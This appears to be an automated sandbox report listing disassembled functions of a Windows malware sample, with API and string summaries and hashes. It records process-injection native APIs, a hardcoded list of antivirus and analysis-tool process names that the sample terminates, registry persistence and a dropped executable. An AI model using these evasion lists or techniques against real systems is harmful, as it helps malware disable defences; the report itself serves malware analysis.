                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                        • String ID: NtClose$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtSetInformationFile$NtSetInformationProcess$NtWriteFile$RtlAdjustPrivilege$RtlInitUnicodeString$ntdll.dll
                                                                                        • API String ID: 2449869053-1333963010
                                                                                        • Opcode ID: 3b84ecef7e8c75bcd1d12f9525db118f6743ea869c907afc9188f40934af8a68
                                                                                        • Instruction ID: 62dd739c5e16161ff1ed29dc1d98f0acc2f056199e62ee0bdbaa3e82eb63b99a
                                                                                        • Opcode Fuzzy Hash: 3b84ecef7e8c75bcd1d12f9525db118f6743ea869c907afc9188f40934af8a68
                                                                                        • Instruction Fuzzy Hash: 9941B52591AA2281EA74EF35F8C4375A3F1FF54F45F802276C49E422B8DF7CA589C260
                                                                                        Function 00007FF795D117C4 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 161libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$FreeInitStringUnicode$AddressDirectoryProc$BlockCreateCurrentEnvironmentLoadSystemwcsnlen
                                                                                        • String ID: Diamotrixed!$NtCurrentPeb$RtlCreateProcessParametersEx$ntdll.dll
                                                                                        • API String ID: 1477408737-2287811734
                                                                                        • Opcode ID: 16a03e98275a15fa7fbf00527d921ee2a87b4c912d7ee25d9fcad31013e44fa4
                                                                                        • Instruction ID: f92427b53d4f63e80e5f93b47a8630b834a441a0c4fb51bb2540f71212d2c65e
                                                                                        • Opcode Fuzzy Hash: 16a03e98275a15fa7fbf00527d921ee2a87b4c912d7ee25d9fcad31013e44fa4
                                                                                        • Instruction Fuzzy Hash: E5910D32619AD591EB70DB25F4843AAB3E1FB84B81F805436C68D43BA9EF7CD149CB10
                                                                                        Function 00007FF795D2DA34 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 94networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Open$CloseHandle
                                                                                        • String ID: Mozilla/5.0
                                                                                        • API String ID: 3289985339-2630049532
                                                                                        • Opcode ID: d808c079d8e75f8a4ac68c4773e767ace300b3f5636902ee28373f7788d6eb60
                                                                                        • Instruction ID: 3fd94f792fb8e4b82d36a7f4d3be2d56010d88b66acc1d88b756f662b06dd8bd
                                                                                        • Opcode Fuzzy Hash: d808c079d8e75f8a4ac68c4773e767ace300b3f5636902ee28373f7788d6eb60
                                                                                        • Instruction Fuzzy Hash: 7151EF3160CA9286E720AF21F49472AF7B0FBC5F95F505135E68E82AA4CF7DD445CB10
                                                                                        Function 00007FF795D11478 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 81libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: NtCreateProcessEx$NtCreateThreadEx$NtQueryInformationFile$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$RtlCreateProcessParametersEx$ntdll.dll
                                                                                        • API String ID: 2574300362-3070941563
                                                                                        • Opcode ID: fe0edb3ea2ea9d1b61de22b004e242eb16fd45174bdc196908c66df22b0c4eac
                                                                                        • Instruction ID: 72a2c8f5dad5c33b19a972f647973e133d0a6e8cc53d994987f2e4b97cdf8c0b
                                                                                        • Opcode Fuzzy Hash: fe0edb3ea2ea9d1b61de22b004e242eb16fd45174bdc196908c66df22b0c4eac
                                                                                        • Instruction Fuzzy Hash: 51419A3590DB6681EA70EF24F48437AA7F4FB98B94F802275D58E06768DF3CD185CA20
                                                                                        Function 00007FF795D3092C Relevance: 25.7, APIs: 17, Instructions: 155memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHeap$AllocCloseCreateHandleProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 4026551389-0
                                                                                        • Opcode ID: dad4417b183fee83f8e059b4764bb9658e6ee4e87390e1ce80ae04f4a6b01d07
                                                                                        • Instruction ID: bccc5d2e1362a053ad7c12993d9ce0bb0d33f257922fab5c7d23fcf55177c1ae
                                                                                        • Opcode Fuzzy Hash: dad4417b183fee83f8e059b4764bb9658e6ee4e87390e1ce80ae04f4a6b01d07
                                                                                        • Instruction Fuzzy Hash: 35812532609B8182EB60DB65F48432AE7A0FBC9B95F505035EA8E83B68DF7CD445CB10
                                                                                        Function 00007FF795D2CEB8 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID: 360sd.exe$360ts.exe$AvastAntivirus.exe$AvastSvc.exe$AvastUI.exe$MsMpEng.exe$avgnext.exe$avgui.exe$avgwdsvc.exe
                                                                                        • API String ID: 2962429428-2792874574
                                                                                        • Opcode ID: 4ea5b1be55232d26d753203b733671219c7c2ad8b1cc2637dc4e508cc27a149c
                                                                                        • Instruction ID: 093dffeddd0fadb0d409dcf39b08bd352d441c805a40632ebf38c7a68344a9b8
                                                                                        • Opcode Fuzzy Hash: 4ea5b1be55232d26d753203b733671219c7c2ad8b1cc2637dc4e508cc27a149c
                                                                                        • Instruction Fuzzy Hash: BF514B11A0CA6350EB30B735E5D137AE6D0EF80B98FD02231E59D865EADF6CDA46C721
                                                                                        Function 00007FF795D1DF2C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Yarn$Exceptionstd::_$FileHeaderLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrow_lockstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                        • String ID: bad locale name
                                                                                        • API String ID: 3938507140-1405518554
                                                                                        • Opcode ID: ad999236b8d4008b2380ea14d0df8985624ecf54030ce66e7ee12e07fe8f9879
                                                                                        • Instruction ID: 9590269a121dea439939c153cc0ec8ed205609f85c3193035485c8cb5e4a2972
                                                                                        • Opcode Fuzzy Hash: ad999236b8d4008b2380ea14d0df8985624ecf54030ce66e7ee12e07fe8f9879
                                                                                        • Instruction Fuzzy Hash: CA11E951F08B9642EE14FBBAE49116DE3A0EF81F94F802035E98D0B76AEFACD0158754
                                                                                        Function 00007FF795D2B728 Relevance: 18.2, APIs: 12, Instructions: 244COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: char_traits$Mtx_guardMtx_guard::~_
                                                                                        • String ID:
                                                                                        • API String ID: 3950283302-0
                                                                                        • Opcode ID: 26e523eaab64f351134ad44a1117f834685a3f9a05b7fda99f5919bc6b6d8d46
                                                                                        • Instruction ID: b0f52adfd010c65406a8f86471f7356eb58b24b1c2224e1c135a9944ec5c1150
                                                                                        • Opcode Fuzzy Hash: 26e523eaab64f351134ad44a1117f834685a3f9a05b7fda99f5919bc6b6d8d46
                                                                                        • Instruction Fuzzy Hash: 7DD1C766A0DBC181DA74EB65F4953AEF3A1FBC9B84F405132DA8D43B6ADF2CD0408B11
                                                                                        Function 00007FF795D2DC08 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 62stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Templstrcpy$ExecuteFileNamePathShell
                                                                                        • String ID: .exe$@$open$p$tmp
                                                                                        • API String ID: 3481378980-1541851258
                                                                                        • Opcode ID: 5c69159e7257d6518b28d152e0a484615bf9003ab4f5bea52d68b51e3ab49161
                                                                                        • Instruction ID: 4946b5426b811239648c6daca3fa2fbb275df41322c8e21594bafb2a5f353b7c
                                                                                        • Opcode Fuzzy Hash: 5c69159e7257d6518b28d152e0a484615bf9003ab4f5bea52d68b51e3ab49161
                                                                                        • Instruction Fuzzy Hash: 9C310A72619B8595EB70EF24F4843AAB7E4FB84B94F801235D68D42AA8DF7CD548CB10
                                                                                        Function 00007FF795D2DD68 Relevance: 16.6, APIs: 11, Instructions: 118stringfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Filestrtok$lstrcmplstrlen$AttributesCopyDelete_getptdlstrcpy
                                                                                        • String ID:
                                                                                        • API String ID: 3928754753-0
                                                                                        • Opcode ID: 69ab1e02483d50d6a6ebcaefcdd74d7f8472b56b7eb2f8c7d3e698012a23ad34
                                                                                        • Instruction ID: 3f83a530db439dd9723078e748d1c43029bf8d5566fdca25fd9fb96b61697c0a
                                                                                        • Opcode Fuzzy Hash: 69ab1e02483d50d6a6ebcaefcdd74d7f8472b56b7eb2f8c7d3e698012a23ad34
                                                                                        • Instruction Fuzzy Hash: 7F51F02261CA9581DB70EB25F49437EA3E0FBC8B88F805135E68D87A99DF3CD645C714
                                                                                        Function 00007FF795D3001C Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF795D310A0: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D30057), ref: 00007FF795D310E8
                                                                                          • Part of subcall function 00007FF795D310A0: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D30057), ref: 00007FF795D31125
                                                                                          • Part of subcall function 00007FF795D310A0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF795D30057), ref: 00007FF795D31130
                                                                                          • Part of subcall function 00007FF795D302E0: RegOpenKeyExW.ADVAPI32 ref: 00007FF795D30323
                                                                                          • Part of subcall function 00007FF795D302E0: RegSetValueExW.ADVAPI32 ref: 00007FF795D30359
                                                                                          • Part of subcall function 00007FF795D302E0: RegCloseKey.ADVAPI32 ref: 00007FF795D30368
                                                                                          • Part of subcall function 00007FF795D30C08: RegDeleteKeyW.ADVAPI32 ref: 00007FF795D30C20
                                                                                          • Part of subcall function 00007FF795D30E78: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF795D30E8B
                                                                                          • Part of subcall function 00007FF795D30E78: Process32FirstW.KERNEL32 ref: 00007FF795D30EB5
                                                                                          • Part of subcall function 00007FF795D30E78: CloseHandle.KERNEL32 ref: 00007FF795D30EC4
                                                                                          • Part of subcall function 00007FF795D30E78: wcscmp.MSVCRT ref: 00007FF795D30ED9
                                                                                          • Part of subcall function 00007FF795D30E78: OpenProcess.KERNEL32 ref: 00007FF795D30EEF
                                                                                          • Part of subcall function 00007FF795D30E78: TerminateProcess.KERNEL32 ref: 00007FF795D30F09
                                                                                          • Part of subcall function 00007FF795D30E78: CloseHandle.KERNEL32 ref: 00007FF795D30F14
                                                                                          • Part of subcall function 00007FF795D30E78: Process32NextW.KERNEL32 ref: 00007FF795D30F24
                                                                                          • Part of subcall function 00007FF795D30E78: CloseHandle.KERNEL32 ref: 00007FF795D30F33
                                                                                          • Part of subcall function 00007FF795D30F48: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF795D30830), ref: 00007FF795D30F77
                                                                                        • Sleep.KERNEL32 ref: 00007FF795D30106
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                        • API String ID: 2853470409-928700279
                                                                                        • Opcode ID: fe3a8ccc8966489c9bf42d5c7acf8396356c702022448553b11e78d999c2d4d6
                                                                                        • Instruction ID: 39031e8a7c78aee660ea77038ec4ea58e120370a1b45adc25225170123ebe759
                                                                                        • Opcode Fuzzy Hash: fe3a8ccc8966489c9bf42d5c7acf8396356c702022448553b11e78d999c2d4d6
                                                                                        • Instruction Fuzzy Hash: 6F219021E5842691FA60BB36ECD11BCA7E0AF60F58FC06571E40D921E6DE3CA54AC3A0
                                                                                        Function 00007FF795D30C44 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF795D30D0C: GetWindowsDirectoryA.KERNEL32 ref: 00007FF795D30D41
                                                                                          • Part of subcall function 00007FF795D30D0C: GetVolumeInformationA.KERNEL32 ref: 00007FF795D30DCF
                                                                                          • Part of subcall function 00007FF795D30D0C: wsprintfA.USER32 ref: 00007FF795D30E5E
                                                                                        • SHGetFolderPathA.SHELL32(?,?,?,?,?,?,?,?,?,00007FF795D2DE7D), ref: 00007FF795D30C85
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF795D2DE7D), ref: 00007FF795D30C97
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF795D2DE7D), ref: 00007FF795D30CA7
                                                                                        • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF795D2DE7D), ref: 00007FF795D30CB4
                                                                                        • SetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF795D2DE7D), ref: 00007FF795D30CC4
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF795D2DE7D), ref: 00007FF795D30CD6
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF795D2DE7D), ref: 00007FF795D30CE6
                                                                                        • lstrcat.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF795D2DE7D), ref: 00007FF795D30CF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                        • String ID: .exe
                                                                                        • API String ID: 1846285901-4119554291
                                                                                        • Opcode ID: 1e0782898900f0c9169d678093e814d4bf1776dfe6d0791ba9bb1146b86bc58f
                                                                                        • Instruction ID: f58b1da45d110e40b0c63e0567a5f2788cf54750d556269eb1fe430aa739fd65
                                                                                        • Opcode Fuzzy Hash: 1e0782898900f0c9169d678093e814d4bf1776dfe6d0791ba9bb1146b86bc58f
                                                                                        • Instruction Fuzzy Hash: 20110021A2C95697DB50AB35F89456AA3A2FBC4B54F907032EA4E43A7CDE3CD446CB10
                                                                                        Function 00007FF795D2FE30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                        • String ID: rbNSpGEsyb
                                                                                        • API String ID: 299056699-189039185
                                                                                        • Opcode ID: 46ba0cd2de08216aef1d8b73fc81ba437baef2bc7f4b68b9de387672fb1d2dc8
                                                                                        • Instruction ID: 8ac8fe03f76b1480d2f8949fa0c08278b461a00d307ffacbf7b534cffcabc88b
                                                                                        • Opcode Fuzzy Hash: 46ba0cd2de08216aef1d8b73fc81ba437baef2bc7f4b68b9de387672fb1d2dc8
                                                                                        • Instruction Fuzzy Hash: 1201712691CA5282E770AB31F8D5229A3B0FBC8F55F842576D68E42678CF3CD555C620
                                                                                        Function 00007FF795D15B38 Relevance: 15.5, APIs: 1, Strings: 9, Instructions: 475sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00007FF795D1D8F4: shared_ptr.LIBCPMTD ref: 00007FF795D1D926
                                                                                          • Part of subcall function 00007FF795D1D7D0: UnDecorator::getVbTableType.LIBCMTD ref: 00007FF795D1D7FF
                                                                                          • Part of subcall function 00007FF795D15A5C: Concurrency::details::VirtualProcessorRoot::GetSchedulerProxy.LIBCMTD ref: 00007FF795D15A9D
                                                                                          • Part of subcall function 00007FF795D13920: shared_ptr.LIBCPMTD ref: 00007FF795D13940
                                                                                          • Part of subcall function 00007FF795D159B8: GlobalAlloc.KERNEL32 ref: 00007FF795D159DF
                                                                                          • Part of subcall function 00007FF795D159B8: GlobalLock.KERNEL32 ref: 00007FF795D159FE
                                                                                          • Part of subcall function 00007FF795D159B8: GlobalUnlock.KERNEL32 ref: 00007FF795D15A1B
                                                                                        • Sleep.KERNEL32 ref: 00007FF795D166A9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2091705761.00007FF795D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF795D10000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2091636333.00007FF795D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091807023.00007FF795D46000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091842185.00007FF795D54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2091913029.00007FF795D5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2093030267.00007FF795D61000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff795d10000_52kYJGCon6.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$shared_ptr$AllocConcurrency::details::Decorator::getLockProcessorProxyRoot::SchedulerSleepTableTypeUnlockVirtual
